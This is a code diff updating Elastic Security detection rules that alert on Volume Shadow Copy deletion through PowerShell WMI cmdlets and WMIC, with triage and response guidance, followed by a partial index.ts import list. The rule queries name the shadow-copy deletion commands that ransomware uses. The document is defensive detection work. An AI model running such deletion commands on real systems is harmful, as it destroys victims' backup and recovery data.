b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json @@ -13,15 +13,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Volume Shadow Copy Deletion via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow\ncopy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and \n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow\ncopy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n", "references": [ "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy", "https://powershell.one/wmi/root/cimv2/win32_shadowcopy", "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -49,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json index a61de760359db..ed80743537b43 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Volume Shadow Copy Deletion via WMIC", - "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"delete\" and process.args : \"shadowcopy\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts index a02e40e55dbeb..20dd6b52d1f67 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts @@ -31,658 +31,665 @@ import rule18 from './apm_403_response_to_a_post.json'; import rule19 from './apm_405_response_method_not_allowed.json'; import rule20 from './apm_null_user_agent.json'; import rule21 from './apm_sqlmap_user_agent.json'; -import rule22 from './command_and_control_dns_directly_to_the_internet.json'; +import rule22 from './command_and_control_linux_iodine_activity.json'; import rule23 from './command_and_control_nat_traversal_port_activity.json'; import rule24 from './command_and_control_port_26_activity.json'; import rule25 from './command_and_control_rdp_remote_desktop_protocol_from_the_internet.json'; import rule26 from './command_and_control_telnet_port_activity.json'; import rule27 from './command_and_control_vnc_virtual_network_computing_from_the_internet.json'; import rule28 from './command_and_control_vnc_virtual_network_computing_to_the_internet.json'; -import rule29 from './defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json'; -import rule30 from './defense_evasion_clearing_windows_event_logs.json'; -import rule31 from './defense_evasion_delete_volume_usn_journal_with_fsutil.json'; -import rule32 from './defense_evasion_disable_windows_firewall_rules_with_netsh.json'; -import rule33 from './defense_evasion_misc_lolbin_connecting_to_the_internet.json'; -import rule34 from './defense_evasion_msbuild_making_network_connections.json'; -import rule35 from './defense_evasion_suspicious_certutil_commands.json'; -import rule36 from './defense_evasion_unusual_network_connection_via_rundll32.json'; -import rule37 from './defense_evasion_unusual_process_network_connection.json'; -import rule38 from './defense_evasion_via_filter_manager.json'; -import rule39 from './discovery_linux_hping_activity.json'; -import rule40 from './discovery_whoami_command_activity.json'; -import rule41 from './endgame_adversary_behavior_detected.json'; -import rule42 from './endgame_cred_dumping_detected.json'; -import rule43 from './endgame_cred_dumping_prevented.json'; -import rule44 from './endgame_cred_manipulation_detected.json'; -import rule45 from './endgame_cred_manipulation_prevented.json'; -import rule46 from './endgame_exploit_detected.json'; -import rule47 from './endgame_exploit_prevented.json'; -import rule48 from './endgame_malware_detected.json'; -import rule49 from './endgame_malware_prevented.json'; -import rule50 from './endgame_permission_theft_detected.json'; -import rule51 from './endgame_permission_theft_prevented.json'; -import rule52 from './endgame_process_injection_detected.json'; -import rule53 from './endgame_process_injection_prevented.json'; -import rule54 from './endgame_ransomware_detected.json'; -import rule55 from './endgame_ransomware_prevented.json'; -import rule56 from './execution_command_prompt_connecting_to_the_internet.json'; -import rule57 from './execution_command_shell_started_by_svchost.json'; -import rule58 from './execution_html_help_executable_program_connecting_to_the_internet.json'; -import rule59 from './execution_psexec_lateral_movement_command.json'; -import rule60 from './execution_register_server_program_connecting_to_the_internet.json'; -import rule61 from './execution_via_compiled_html_file.json'; -import rule62 from './impact_deleting_backup_catalogs_with_wbadmin.json'; -import rule63 from './impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json'; -import rule64 from './impact_volume_shadow_copy_deletion_via_wmic.json'; -import rule65 from './initial_access_rpc_remote_procedure_call_from_the_internet.json'; -import rule66 from './initial_access_rpc_remote_procedure_call_to_the_internet.json'; -import rule67 from './initial_access_script_executing_powershell.json'; -import rule68 from './initial_access_smb_windows_file_sharing_activity_to_the_internet.json'; -import rule69 from './initial_access_suspicious_ms_office_child_process.json'; -import rule70 from './initial_access_suspicious_ms_outlook_child_process.json'; -import rule71 from './lateral_movement_direct_outbound_smb_connection.json'; -import rule72 from './lateral_movement_service_control_spawned_script_int.json'; -import rule73 from './linux_iodine_activity.json'; -import rule74 from './linux_netcat_network_connection.json'; -import rule75 from './linux_nping_activity.json'; -import rule76 from './linux_process_started_in_temp_directory.json'; -import rule77 from './persistence_adobe_hijack_persistence.json'; -import rule78 from './persistence_local_scheduled_task_creation.json'; -import rule79 from './persistence_priv_escalation_via_accessibility_features.json'; -import rule80 from './persistence_shell_activity_by_web_server.json'; -import rule81 from './persistence_system_shells_via_services.json'; -import rule82 from './persistence_user_account_creation.json'; -import rule83 from './persistence_via_application_shimming.json'; -import rule84 from './privilege_escalation_linux_strace_activity.json'; -import rule85 from './privilege_escalation_unusual_parentchild_relationship.json'; -import rule86 from './impact_modification_of_boot_config.json'; -import rule87 from './privilege_escalation_uac_bypass_event_viewer.json'; -import rule88 from './defense_evasion_msxsl_network.json'; -import rule89 from './discovery_command_system_account.json'; -import rule90 from './command_and_control_certutil_network_connection.json'; -import rule91 from './defense_evasion_cve_2020_0601.json'; -import rule92 from './credential_access_credential_dumping_msbuild.json'; -import rule93 from './defense_evasion_execution_msbuild_started_by_office_app.json'; -import rule94 from './defense_evasion_execution_msbuild_started_by_script.json'; -import rule95 from './defense_evasion_execution_msbuild_started_by_system_process.json'; -import rule96 from './defense_evasion_execution_msbuild_started_renamed.json'; -import rule97 from './defense_evasion_execution_msbuild_started_unusal_process.json'; -import rule98 from './defense_evasion_injection_msbuild.json'; -import rule99 from './ml_linux_anomalous_network_activity.json'; -import rule100 from './ml_linux_anomalous_network_port_activity.json'; -import rule101 from './ml_linux_anomalous_process_all_hosts.json'; -import rule102 from './ml_linux_anomalous_user_name.json'; -import rule103 from './ml_packetbeat_dns_tunneling.json'; -import rule104 from './ml_packetbeat_rare_dns_question.json'; -import rule105 from './ml_packetbeat_rare_server_domain.json'; -import rule106 from './ml_packetbeat_rare_urls.json'; -import rule107 from './ml_packetbeat_rare_user_agent.json'; -import rule108 from './ml_rare_process_by_host_linux.json'; -import rule109 from './ml_rare_process_by_host_windows.json'; -import rule110 from './ml_suspicious_login_activity.json'; -import rule111 from './ml_windows_anomalous_network_activity.json'; -import rule112 from './ml_windows_anomalous_path_activity.json'; -import rule113 from './ml_windows_anomalous_process_all_hosts.json'; -import rule114 from './ml_windows_anomalous_process_creation.json'; -import rule115 from './ml_windows_anomalous_script.json'; -import rule116 from './ml_windows_anomalous_service.json'; -import rule117 from './ml_windows_anomalous_user_name.json'; -import rule118 from './ml_windows_rare_user_runas_event.json'; -import rule119 from './ml_windows_rare_user_type10_remote_login.json'; -import rule120 from './execution_suspicious_pdf_reader.json'; -import rule121 from './privilege_escalation_sudoers_file_mod.json'; -import rule122 from './defense_evasion_iis_httplogging_disabled.json'; -import rule123 from './execution_python_tty_shell.json'; -import rule124 from './execution_perl_tty_shell.json'; -import rule125 from './defense_evasion_base16_or_base32_encoding_or_decoding_activity.json'; -import rule126 from './defense_evasion_file_mod_writable_dir.json'; -import rule127 from './defense_evasion_disable_selinux_attempt.json'; -import rule128 from './discovery_kernel_module_enumeration.json'; -import rule129 from './lateral_movement_telnet_network_activity_external.json'; -import rule130 from './lateral_movement_telnet_network_activity_internal.json'; -import rule131 from './privilege_escalation_setuid_setgid_bit_set_via_chmod.json'; -import rule132 from './defense_evasion_attempt_to_disable_iptables_or_firewall.json'; -import rule133 from './defense_evasion_kernel_module_removal.json'; -import rule134 from './defense_evasion_attempt_to_disable_syslog_service.json'; -import rule135 from './defense_evasion_file_deletion_via_shred.json'; -import rule136 from './discovery_virtual_machine_fingerprinting.json'; -import rule137 from './defense_evasion_hidden_file_dir_tmp.json'; -import rule138 from './defense_evasion_deletion_of_bash_command_line_history.json'; -import rule139 from './impact_cloudwatch_log_group_deletion.json'; -import rule140 from './impact_cloudwatch_log_stream_deletion.json'; -import rule141 from './impact_rds_instance_cluster_stoppage.json'; -import rule142 from './persistence_attempt_to_deactivate_mfa_for_okta_user_account.json'; -import rule143 from './persistence_rds_cluster_creation.json'; -import rule144 from './credential_access_attempted_bypass_of_okta_mfa.json'; -import rule145 from './defense_evasion_waf_acl_deletion.json'; -import rule146 from './impact_attempt_to_revoke_okta_api_token.json'; -import rule147 from './impact_iam_group_deletion.json'; -import rule148 from './impact_possible_okta_dos_attack.json'; -import rule149 from './impact_rds_instance_cluster_deletion.json'; -import rule150 from './initial_access_suspicious_activity_reported_by_okta_user.json'; -import rule151 from './okta_attempt_to_deactivate_okta_policy.json'; -import rule152 from './okta_attempt_to_deactivate_okta_policy_rule.json'; -import rule153 from './okta_attempt_to_modify_okta_network_zone.json'; -import rule154 from './okta_attempt_to_modify_okta_policy.json'; -import rule155 from './okta_attempt_to_modify_okta_policy_rule.json'; -import rule156 from './okta_threat_detected_by_okta_threatinsight.json'; -import rule157 from './persistence_administrator_privileges_assigned_to_okta_group.json'; -import rule158 from './persistence_attempt_to_create_okta_api_token.json'; -import rule159 from './persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json'; -import rule160 from './defense_evasion_cloudtrail_logging_deleted.json'; -import rule161 from './defense_evasion_ec2_network_acl_deletion.json'; -import rule162 from './impact_iam_deactivate_mfa_device.json'; -import rule163 from './defense_evasion_s3_bucket_configuration_deletion.json'; -import rule164 from './defense_evasion_guardduty_detector_deletion.json'; -import rule165 from './okta_attempt_to_delete_okta_policy.json'; -import rule166 from './credential_access_iam_user_addition_to_group.json'; -import rule167 from './persistence_ec2_network_acl_creation.json'; -import rule168 from './impact_ec2_disable_ebs_encryption.json'; -import rule169 from './persistence_iam_group_creation.json'; -import rule170 from './defense_evasion_waf_rule_or_rule_group_deletion.json'; -import rule171 from './collection_cloudtrail_logging_created.json'; -import rule172 from './defense_evasion_cloudtrail_logging_suspended.json'; -import rule173 from './impact_cloudtrail_logging_updated.json'; -import rule174 from './initial_access_console_login_root.json'; -import rule175 from './defense_evasion_cloudwatch_alarm_deletion.json'; -import rule176 from './defense_evasion_ec2_flow_log_deletion.json'; -import rule177 from './defense_evasion_configuration_recorder_stopped.json'; -import rule178 from './exfiltration_ec2_snapshot_change_activity.json'; -import rule179 from './defense_evasion_config_service_rule_deletion.json'; -import rule180 from './okta_attempt_to_modify_or_delete_application_sign_on_policy.json'; -import rule181 from './command_and_control_download_rar_powershell_from_internet.json'; -import rule182 from './initial_access_password_recovery.json'; -import rule183 from './command_and_control_cobalt_strike_beacon.json'; -import rule184 from './command_and_control_fin7_c2_behavior.json'; -import rule185 from './command_and_control_halfbaked_beacon.json'; -import rule186 from './credential_access_secretsmanager_getsecretvalue.json'; -import rule187 from './initial_access_via_system_manager.json'; -import rule188 from './privilege_escalation_root_login_without_mfa.json'; -import rule189 from './privilege_escalation_updateassumerolepolicy.json'; -import rule190 from './impact_hosts_file_modified.json'; -import rule191 from './elastic_endpoint_security.json'; -import rule192 from './external_alerts.json'; -import rule193 from './initial_access_login_failures.json'; -import rule194 from './initial_access_login_location.json'; -import rule195 from './initial_access_login_sessions.json'; -import rule196 from './initial_access_login_time.json'; -import rule197 from './ml_cloudtrail_error_message_spike.json'; -import rule198 from './ml_cloudtrail_rare_error_code.json'; -import rule199 from './ml_cloudtrail_rare_method_by_city.json'; -import rule200 from './ml_cloudtrail_rare_method_by_country.json'; -import rule201 from './ml_cloudtrail_rare_method_by_user.json'; -import rule202 from './credential_access_aws_iam_assume_role_brute_force.json'; -import rule203 from './credential_access_okta_brute_force_or_password_spraying.json'; -import rule204 from './initial_access_unusual_dns_service_children.json'; -import rule205 from './initial_access_unusual_dns_service_file_writes.json'; -import rule206 from './lateral_movement_dns_server_overflow.json'; -import rule207 from './credential_access_root_console_failure_brute_force.json'; -import rule208 from './initial_access_unsecure_elasticsearch_node.json'; -import rule209 from './impact_virtual_network_device_modified.json'; -import rule210 from './credential_access_domain_backup_dpapi_private_keys.json'; -import rule211 from './persistence_gpo_schtask_service_creation.json'; -import rule212 from './credential_access_credentials_keychains.json'; -import rule213 from './credential_access_kerberosdump_kcc.json'; -import rule214 from './defense_evasion_attempt_del_quarantine_attrib.json'; -import rule215 from './execution_suspicious_psexesvc.json'; -import rule216 from './execution_via_xp_cmdshell_mssql_stored_procedure.json'; -import rule217 from './privilege_escalation_printspooler_service_suspicious_file.json'; -import rule218 from './privilege_escalation_printspooler_suspicious_spl_file.json'; -import rule219 from './defense_evasion_azure_diagnostic_settings_deletion.json'; -import rule220 from './execution_command_virtual_machine.json'; -import rule221 from './execution_via_hidden_shell_conhost.json'; -import rule222 from './impact_resource_group_deletion.json'; -import rule223 from './persistence_via_telemetrycontroller_scheduledtask_hijack.json'; -import rule224 from './persistence_via_update_orchestrator_service_hijack.json'; -import rule225 from './collection_update_event_hub_auth_rule.json'; -import rule226 from './credential_access_iis_apppoolsa_pwd_appcmd.json'; -import rule227 from './credential_access_iis_connectionstrings_dumping.json'; -import rule228 from './defense_evasion_event_hub_deletion.json'; -import rule229 from './defense_evasion_firewall_policy_deletion.json'; -import rule230 from './defense_evasion_sdelete_like_filename_rename.json'; -import rule231 from './lateral_movement_remote_ssh_login_enabled.json'; -import rule232 from './persistence_azure_automation_account_created.json'; -import rule233 from './persistence_azure_automation_runbook_created_or_modified.json'; -import rule234 from './persistence_azure_automation_webhook_created.json'; -import rule235 from './privilege_escalation_uac_bypass_diskcleanup_hijack.json'; -import rule236 from './credential_access_attempts_to_brute_force_okta_user_account.json'; -import rule237 from './credential_access_storage_account_key_regenerated.json'; -import rule238 from './defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json'; -import rule239 from './defense_evasion_system_critical_proc_abnormal_file_activity.json'; -import rule240 from './defense_evasion_unusual_system_vp_child_program.json'; -import rule241 from './discovery_blob_container_access_mod.json'; -import rule242 from './persistence_mfa_disabled_for_azure_user.json'; -import rule243 from './persistence_user_added_as_owner_for_azure_application.json'; -import rule244 from './persistence_user_added_as_owner_for_azure_service_principal.json'; -import rule245 from './defense_evasion_dotnet_compiler_parent_process.json'; -import rule246 from './defense_evasion_suspicious_managedcode_host_process.json'; -import rule247 from './execution_command_shell_started_by_unusual_process.json'; -import rule248 from './defense_evasion_masquerading_as_elastic_endpoint_process.json'; -import rule249 from './defense_evasion_masquerading_suspicious_werfault_childproc.json'; -import rule250 from './defense_evasion_masquerading_werfault.json'; -import rule251 from './credential_access_key_vault_modified.json'; -import rule252 from './credential_access_mimikatz_memssp_default_logs.json'; -import rule253 from './defense_evasion_code_injection_conhost.json'; -import rule254 from './defense_evasion_network_watcher_deletion.json'; -import rule255 from './initial_access_external_guest_user_invite.json'; -import rule256 from './defense_evasion_masquerading_renamed_autoit.json'; -import rule257 from './impact_azure_automation_runbook_deleted.json'; -import rule258 from './initial_access_consent_grant_attack_via_azure_registered_application.json'; -import rule259 from './persistence_azure_conditional_access_policy_modified.json'; -import rule260 from './persistence_azure_privileged_identity_management_role_modified.json'; -import rule261 from 